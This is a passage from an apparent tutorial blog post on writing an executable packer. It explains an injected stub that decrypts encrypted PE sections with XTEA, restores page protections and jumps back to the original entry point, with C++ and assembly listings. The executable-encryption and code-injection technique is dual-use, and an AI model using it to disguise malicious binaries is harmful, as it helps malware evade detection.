                *(current_byte+6) = (full_block[1] & 0x0000FF00) >> 8;
                *(current_byte+5) = (full_block[1] & 0x00FF0000) >> 16;
                *(current_byte+4) = (full_block[1] & 0xFF000000) >> 24;
                //Restore the original protections; VirtualProtect fails if lpflOldProtect is NULL
                virtualprotect_addr(current_byte, sizeof(DWORD_PTR) * 2, old_protections, &old_protections);
            }
        }
        section_names_equal = 0;
    }
    __asm {
        mov esp, ebp
        pop ebp
        ret 0x8
    }

The first thing to note is how string initialization is done. Each string has its own label at the bottom of the function. The jmp in the initialization block goes to that label, which immediately performs a call back to the label following the jmp (virtualprotectback, section_nameback, and so on). The raw bytes of the string are emitted directly after this call instruction, so the return address that the call pushes on the stack is the address of the first byte of the string. Back at the label that was called, the return address is popped off the stack and stored in the appropriate string variable. What follows then is that the address of VirtualProtect is retrieved. This function will be used to give PAGE_EXECUTE_READWRITE permission to the block of bytes to be decrypted. This is needed since not every section is mapped writable, and writing the decrypted bytes to a read-only page would cause an access violation. Eight bytes are read from the section in memory at a time and the decryption routine is performed on them. Sections named .rdata, .rsrc, and .inject are not decrypted. This is because .rdata and .rsrc were not encrypted initially, and because .inject is the section name of the injected code. The decrypted bytes are written into memory and the loop continues until all bytes have been decrypted.
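
To see that the decryption loop in the stub really undoes the encryption loop in Encrypter.cpp, the two can be combined into one portable round-trip sketch. The helper names (load_be32, store_be32, xtea_buffer_sketch) are hypothetical and not part of the project; the key, delta, round count, and big-endian packing of each eight-byte block are taken from the listings.

```cpp
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

//Reads four bytes as one big-endian 32-bit value, the same packing both listings use
static uint32_t load_be32(const unsigned char *p) {
    return ((uint32_t)p[0] << 24) | ((uint32_t)p[1] << 16) | ((uint32_t)p[2] << 8) | (uint32_t)p[3];
}

//Writes a 32-bit value back as four big-endian bytes
static void store_be32(unsigned char *p, uint32_t value) {
    p[0] = (unsigned char)(value >> 24);
    p[1] = (unsigned char)(value >> 16);
    p[2] = (unsigned char)(value >> 8);
    p[3] = (unsigned char)value;
}

//Encrypts or decrypts a buffer in place with XTEA, eight bytes at a time
void xtea_buffer_sketch(unsigned char *buffer, size_t size, const uint32_t key[4], bool decrypting) {
    const uint32_t delta = 0x9E3779B9;
    const unsigned int num_rounds = 32;
    assert(size % 8 == 0);  //Whole blocks only
    for(size_t offset = 0; offset < size; offset += 8) {
        uint32_t v0 = load_be32(buffer + offset);
        uint32_t v1 = load_be32(buffer + offset + 4);
        uint32_t sum = decrypting ? delta * num_rounds : 0;
        for(unsigned int i = 0; i < num_rounds; ++i) {
            if(decrypting) {
                v1 -= (((v0 << 4) ^ (v0 >> 5)) + v0) ^ (sum + key[(sum >> 11) & 3]);
                sum -= delta;
                v0 -= (((v1 << 4) ^ (v1 >> 5)) + v1) ^ (sum + key[sum & 3]);
            } else {
                v0 += (((v1 << 4) ^ (v1 >> 5)) + v1) ^ (sum + key[sum & 3]);
                sum += delta;
                v1 += (((v0 << 4) ^ (v0 >> 5)) + v0) ^ (sum + key[(sum >> 11) & 3]);
            }
        }
        store_be32(buffer + offset, v0);
        store_be32(buffer + offset + 4, v1);
    }
}
```

Encrypting a buffer and then decrypting it with the same key should give back the original bytes, which is a cheap way to check the stub's inlined decryption against the encrypter before injecting anything.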

The last thing that needs to be done is to jump back to the original entry point. This is done with the following code:

__asm { //Epilogue, stub exit point
    mov eax, target_image_base
    add eax, 0xCCDDEEFF     //Signature to be replaced by original entry point (OEP)
    mov esp, ebp
    mov [esp+0x20], eax     //Store OEP in EAX through ESP to preserve across popad
    pop ebp
    popad                   //Restore thread context, with OEP in EAX
    jmp eax                 //Jump to OEP
}

In the epilogue of the code to inject, the load address is moved into EAX. Then the dummy value of 0xCCDDEEFF is added to it. This dummy value serves as a signature and is replaced by the injector with the original entry point (an RVA), so the sum is the absolute address of the original entry point. After ESP is reset to EBP, that address is written to [ESP+0x20], which is where the saved EAX sits on the stack after the pushad and push ebp instructions. The stack frame is then destroyed and the registers are restored to what they would be if there were no injected code (except EAX, which now contains the original entry point). A jump is made to EAX and now execution can be returned to the normal application. Shown below are examples of how instructions look when the application starts. Notice that none of the instructions in the original entry point make sense (this is because they’re encrypted). After the stub finishes its decryption routine, the instructions are returned to normal.

Encrypted instructions in the .text section of the process. OllyDbg’s analysis on them couldn’t make any sense of it.

The decrypted code at the entry point of the program. This image was taken after the jump to the original entry point.
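
The signature replacement that the epilogue relies on can also be sketched in portable C++. This is a bounded variant written for illustration, not the project's write_stub_entry_point: the function name and the explicit stub_size parameter are assumptions, added so that the search stops at the end of the stub instead of scanning until a match turns up.

```cpp
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

//Replaces the first 0xCCDDEEFF placeholder in the stub bytes with the original entry point RVA
//Returns false if the placeholder is not found within stub_size bytes
bool patch_oep_signature(unsigned char *stub, size_t stub_size, uint32_t oep_rva) {
    //0xCCDDEEFF as it appears in memory on little-endian x86
    static const unsigned char signature[4] = {0xFF, 0xEE, 0xDD, 0xCC};
    if(stub == NULL || stub_size < sizeof(signature)) {
        return false;
    }
    for(size_t i = 0; i + sizeof(signature) <= stub_size; ++i) {
        if(memcmp(stub + i, signature, sizeof(signature)) == 0) {
            //Store the RVA in little-endian order, as the add eax, imm32 operand expects
            stub[i + 0] = (unsigned char)(oep_rva & 0xFF);
            stub[i + 1] = (unsigned char)((oep_rva >> 8) & 0xFF);
            stub[i + 2] = (unsigned char)((oep_rva >> 16) & 0xFF);
            stub[i + 3] = (unsigned char)((oep_rva >> 24) & 0xFF);
            return true;
        }
    }
    return false;
}
```

For example, the bytes 05 FF EE DD CC (add eax, 0xCCDDEEFF) patched with an RVA of 0x1234 become 05 34 12 00 00, and a second call on the same bytes returns false because the placeholder is gone.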

 

A downloadable PDF of this post can be found here
